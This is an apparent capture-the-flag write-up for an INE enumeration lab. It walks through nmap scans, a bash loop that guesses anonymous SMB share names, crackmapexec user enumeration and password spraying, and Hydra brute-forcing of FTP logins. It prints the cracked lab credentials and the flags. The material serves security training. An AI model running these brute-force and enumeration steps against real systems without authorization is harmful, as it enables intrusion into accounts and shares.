Enumeration CTF 1
Overview¶
This lab focuses on enumeration techniques to identify and analyze running services on a target Linux machine. The goal is to explore and interact with the machine's services to uncover and capture hidden flags. Participants will apply their knowledge of network and system enumeration to identify misconfigurations, weak credentials, and potential security vulnerabilities.
A Linux machine is accessible at target.ine.local. Identify the services running on the machine and capture the flags. The flag is in md5 hash format.
Flag 1: There is a samba share that allows anonymous access. Wonder what's in there!
Flag 2: One of the samba users has a weak password. Their private share with the same name as their username is at risk!
Flag 3: Follow the hint given in the previous flag to uncover this one.
Flag 4: This is a warning meant to deter unauthorized users from logging in.
Note: The wordlists located in the following directory will be useful:
/root/Desktop/wordlists
Writeup¶
Flag 1¶
Let's start with a classic nmap scan.
┌──(root㉿INE)-[~]
└─# nmap -p- target.ine.local --min-rate=10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-02 18:43 IST
Nmap scan report for target.ine.local (192.117.124.3)
Host is up (0.000024s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5554/tcp open sgi-esphttp
MAC Address: 02:42:C0:75:7C:03 (Unknown)
┌──(root㉿INE)-[~]
└─# nmap -p 22,139,445,5554 target.ine.local -sC -sV
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-02 18:44 IST
Nmap scan report for target.ine.local (192.117.124.3)
Host is up (0.000043s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 bb:ca:49:7e:f5:5c:6e:bf:8a:55:a1:69:d9:c9:18:01 (RSA)
| 256 da:06:c1:ab:e7:6f:14:b9:50:d5:43:a7:47:ab:80:ce (ECDSA)
|_ 256 a1:5c:ab:22:6b:c2:f1:5c:5a:7a:5a:d8:e7:81:e2:33 (ED25519)
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
5554/tcp open ftp vsftpd 2.0.8 or later
MAC Address: 02:42:C0:75:7C:03 (Unknown)
Service Info: Host: blah; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb2-time:
| date: 2025-04-02T13:14:27
|_ start_date: N/A
|_nbstat: NetBIOS name: TARGET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.05 seconds
The instructions say that it is possible to access the smb service with a NULL session, let's verify.
┌──(root㉿INE)-[~]
└─# smbclient -N -L //target.ine.local
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (target server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
Protocol negotiation to server target.ine.local (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available
#!/bin/bash
shares=`cat wordlists/shares.txt`
for i in $shares; do
echo "Trying $i"
smbclient -N //$target/$i
done;
Run the script and gain NULL access to a share.
...extisting code...
Trying commonsfiles
tree connect failed: NT_STATUS_BAD_NETWORK_NAME
Trying pubfiles
Try "help" to get a list of possible commands.
smb: \>
Check the content of the share and capture the flag.
smb: \> get flag1.txt
getting file \flag1.txt of size 40 as flag1.txt (19.5 KiloBytes/sec) (average 19.5 KiloBytes/sec)
smb: \> ^C
┌──(root㉿INE)-[~/Desktop]
└─# cat flag1.txt
FLAG1{37af3ea4010847989d9db9550c1ed9d8}
Flag 2¶
For flag two, it says that there is a user with a weak password and has a share with the same nickname. Let's enumerate users with crackmapexec.
┌──(root㉿INE)-[~/Desktop]
└─# crackmapexec smb $target --users
SMB target.ine.local 445 TARGET [*] Windows 6.1 Build 0 (name:TARGET) (domain:ine.local) (signing:False) (SMBv1:False)
SMB target.ine.local 445 TARGET [-] Error enumerating domain users using dc ip target.ine.local: socket connection error while opening: [Errno 111] Connection refused
SMB target.ine.local 445 TARGET [*] Trying with SAMRPC protocol
SMB target.ine.local 445 TARGET [+] Enumerated domain user(s)
SMB target.ine.local 445 TARGET ine.local\josh
SMB target.ine.local 445 TARGET ine.local\nancy
SMB target.ine.local 445 TARGET ine.local\bob
SMB target.ine.local 445 TARGET [+] Enumerated domain user(s)
SMB target.ine.local 445 TARGET ine.local\josh
SMB target.ine.local 445 TARGET ine.local\nancy
SMB target.ine.local 445 TARGET ine.local\bob
Save the users in a file.
┌──(root㉿INE)-[~/Desktop]
└─# cat cme.txt | grep " ine.local" | cut -d "\\" -f2
josh
nancy
bob
josh
nancy
bob
┌──(root㉿INE)-[~/Desktop]
└─# cat cme.txt | grep " ine.local" | cut -d "\\" -f2 > users.txt
crackmapexec and the password list provided. ┌──(root㉿INE)-[~/Desktop]
└─# crackmapexec smb $target -u users.txt -p wordlists/unix_passwords.txt
SMB target.ine.local 445 TARGET [*] Windows 6.1 Build 0 (name:TARGET) (domain:ine.local) (signing:False) (SMBv1:False)
SMB target.ine.local 445 TARGET [-] ine.local\josh:admin STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:123456 STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:12345 STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:123456789 STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:password STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:iloveyou STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:princess STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:1234567 STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:12345678 STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:abc123 STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:nicole STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:daniel STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:babygirl STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:monkey STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:lovely STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:jessica STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:654321 STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:michael STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:ashley STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:qwerty STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:111111 STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:iloveu STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:000000 STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:michelle STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:tigger STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:sunshine STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:chocolate STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:password1 STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:soccer STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:anthony STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:friends STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [-] ine.local\josh:butterfly STATUS_LOGON_FAILURE
SMB target.ine.local 445 TARGET [+] ine.local\josh:purple
josh:purple Connect to his share.
┌──(root㉿INE)-[~/Desktop]
└─# smbclient //$target/josh -U josh
Password for [WORKGROUP\josh]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Apr 2 18:37:22 2025
.. D 0 Tue Nov 19 10:44:41 2024
flag2.txt N 119 Wed Apr 2 18:37:22 2025
1981311780 blocks of size 1024. 87557272 blocks available
smb: \> get flag2.txt
getting file \flag2.txt of size 119 as flag2.txt (58.1 KiloBytes/sec) (average 58.1 KiloBytes/sec)
smb: \> exit
┌──(root㉿INE)-[~/Desktop]
└─# cat flag2.txt
FLAG2{3cddd08267af46db87ab3eacab0b5388}
Psst! I heard there is an FTP service running. Find it and check the banner.
Flag 3¶
Follow the hint and check the FTP banner. From the initial nmap scan, we see an FTP service on port 5554.
──(root㉿INE)-[~/Desktop]
└─# ftp $target -p 5554
Connected to target.ine.local.
220 Welcome to blah FTP service. Reminder to users, specifically ashley, alice and amanda to change their weak passwords immediately!!!
Name (target.ine.local:root):
The hint tells you there are three users: ashley, alice and amanda (saved in users.txt). Let's bruteforce their passwords using Hydra.
┌──(root㉿INE)-[~/Desktop]
└─# hydra -L users.txt -P wordlists/unix_passwords.txt ftp://$target:5554
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-04-02 19:21:10
[DATA] max 16 tasks per 1 server, overall 16 tasks, 3027 login tries (l:3/p:1009), ~190 tries per task
[DATA] attacking ftp://target.ine.local:5554/
[STATUS] 304.00 tries/min, 304 tries in 00:01h, 2723 to do in 00:09h, 16 active
[STATUS] 304.00 tries/min, 912 tries in 00:03h, 2115 to do in 00:07h, 16 active
[5554][ftp] host: target.ine.local login: alice password: pretty
[STATUS] 430.00 tries/min, 3010 tries in 00:07h, 17 to do in 00:01h, 16 active
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-04-02 19:28:17
alice:pretty. Connect to FTP using the credentials.
┌──(root㉿INE)-[~/Desktop]
└─# ftp $target 5554
Connected to target.ine.local.
220 Welcome to blah FTP service. Reminder to users, specifically ashley, alice and amanda to change their weak passwords immediately!!!
Name (target.ine.local:root): alice
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||35581|)
150 Here comes the directory listing.
-rw-rw-r-- 1 0 0 40 Apr 02 13:07 flag3.txt
226 Directory send OK.
ftp> get flag3.txt
local: flag3.txt remote: flag3.txt
229 Entering Extended Passive Mode (|||25136|)
150 Opening BINARY mode data connection for flag3.txt (40 bytes).
100% |********| 40 685.30 KiB/s 00:00 ETA
226 Transfer complete.
40 bytes received in 00:00 (117.30 KiB/s)
ftp> exit
221 Goodbye.
┌──(root㉿INE)-[~/Desktop]
└─# cat flag3.txt
FLAG3{8e58cfb8d2784d97a4c612bb613594a9}
Flag 4¶
The flag indicates a warning message for unauthorized access, which is often present when connecting to the ssh service.
┌──(root㉿INE)-[~/Desktop]
└─# ssh alice@$target
The authenticity of host 'target.ine.local (192.117.124.3)' can't be established.
ED25519 key fingerprint is SHA256:qWHJnmTFgrmLKFbmMNRLIr1Y8MVWpqGGxhJ5miFHgnQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'target.ine.local' (ED25519) to the list of known hosts.
********************************************************************
* *
* WARNING: Unauthorized access to this system *
* is strictly prohibited and may be subject to *
* criminal prosecution. *
* *
* This system is for authorized users only. *
* All activities on this system are monitored *
* and recorded. *
* *
* By accessing this system, you consent to *
* such monitoring and recording. *
* *
* If you are not an authorized user, *
* disconnect immediately. *
* *
********************************************************************
* *
* Is this what you're looking for?: FLAG4{a2c98bf3b1424c79bb331b44ec4c85f9} *
* *
********************************************************************
alice@target.ine.local's password: